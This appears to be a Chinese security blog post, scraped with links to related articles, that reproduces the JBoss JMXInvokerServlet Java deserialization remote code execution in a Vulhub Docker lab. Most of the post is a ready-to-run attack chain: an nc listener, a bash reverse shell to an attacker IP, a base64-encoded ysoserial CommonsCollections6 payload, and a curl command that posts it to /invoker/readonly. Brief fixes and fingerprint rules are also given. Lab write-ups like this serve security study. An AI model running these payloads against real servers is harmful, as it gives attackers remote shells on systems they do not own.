代码编织梦想

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、漏洞名称

Jboss_JMXInvokerServlet_Deserialization代码执行漏洞

二、影响范围

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

三、JBoss-AS指纹信息

{	"match": "body_contains",
	"content": "manage this jboss as instance"},

{	"match": "title_contains",
	"content": "welcome to jboss as"},

{	"match": "header_contains",
"content": "jbossas"},

{	"match": "banner_contains",
	"content": "jbossas"}

四、漏洞描述

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

五、环境搭建

1. 进入JMXInvokerServlet-deserialization环境

cd vulhub/jboss/JMXInvokerServlet-deserialization

在这里插入图片描述

2.启动JMXInvokerServlet-deserialization环境

docker-compose up -d

在这里插入图片描述

3.查看JMXInvokerServlet-deserialization环境

docker-compose ps

在这里插入图片描述

4.访问JMXInvokerServlet-deserialization环境

http://you-ip:8080

在这里插入图片描述

5.查看JMXInvokerServlet-deserialization提示信息

cat README.md 

在这里插入图片描述

6.关闭JMXInvokerServlet-deserialization环境

使用完成记得关闭环境

docker-compose down

在这里插入图片描述

六、漏洞复现

靶机:kali:192.168.13.131
攻击机:centos:192.168.13.133
攻击机:windows:192.168.192.1

1、攻击机监听

采用nc监听55555端口

.\nc.exe -lvvp 55555 

在这里插入图片描述

2、靶机连接

1.准备工具

利用ysoserral攻击进行生成poc.ser
在这里插入图片描述
在这里插入图片描述

2.准备反弹shell命令并编码

准备反弹shell命令并进行编码

bash -i >& /dev/tcp/192.168.192.1/55555 0>&1
https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec

在这里插入图片描述

3.生成poc.ser文件

java  -jar  ysoserial-all.jar  CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5Mi4xLzU1NTU1IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

在这里插入图片描述

4.靶机执行命令

使用curl命令以post方式进行请求,令靶机执行反弹shell命令

curl http://192.168.13.131:8080/invoker/readonly --data-binary @poc.ser

在这里插入图片描述

3、getshell成功

在这里插入图片描述

七、漏洞修复

1、不需要 http-invoker.sar 组件的用户可直接删除此组件。
2、添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中,对 http invoker 组件进行访问控制:/*

八、相关资源

1.ysoserial工具下载地址:

https://download.csdn.net/download/qq_51577576/86514048

2.exec采用在线工具:

https://www.loadcaps.com/runtime-exec-payloads/#java-lang-Runtime-exec

.3.docker 搭建 vulhub 靶场环境

https://blog.csdn.net/qq_51577576/article/details/125048165

4.nc反弹shell

https://blog.csdn.net/qq_51577576/article/details/126128251

5.bash反弹shell

https://blog.csdn.net/qq_51577576/article/details/126651576

6.powercat反弹shell

https://blog.csdn.net/qq_51577576/article/details/126682933

7.python反弹shell

https://blog.csdn.net/qq_51577576/article/details/126693846
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/126881060

【序列化】UNSAFE_DESERIALIZATION 不安全的反序列化和反序列化漏洞-爱代码爱编程

文章目录 Unsafe Deserialization反序列化漏洞背景认识Java序列化与反序列化用途应用场景Java中的API实现:序列化基础类型参数序列化对象漏洞是怎么来的呢?解决方案 注意:本文例子都是在JDK1.8下跑的 Unsafe Deserialization 进行代码检查时,Coverity工具在进行json转换时

JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)-爱代码爱编程

声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.

java反序列化_反序列化问题的研究之java篇-爱代码爱编程

博客园很早就开通了,当时下决心要把自己的经验心得记录上去,但是却没有做到,因为一直觉得自己搞得东西可能还是比较的初级,感觉拿不出手,所以也就是只是把它记录在在印象笔记上面。三年下来,还是整理和收藏了一些笔记和心得,但也导致了一个问题,就是自己写起来就比较的随便,所以现在还是觉得要放到网上来,一来为了整理自己的思路,对自己这几年做的安全的一个总结和交代,

【jboss漏洞复现】CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞-爱代码爱编程

CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选

利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞-爱代码爱编程

JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理复现过程 启动环境端口设置 浏览器设置BurpSuit设置复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/enviro

Jboss反序列化漏洞的复现与原理-爱代码爱编程

一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应

【CVE-2017-3241】Java RMI远程反序列化代码执行-爱代码爱编程

对于Java RMI,只要是以对象为参数的接口,都可以在客户端构建一个对象,强迫服务端对这个存在于Class Path下可序列化类进行反序列化,从而执行一个不在计划内的方法。 一、了解什么是Java RMI? RMI(Remote Method Invocation),即远程方法调用 1.1 是什么? RMI是一个通信工具,支持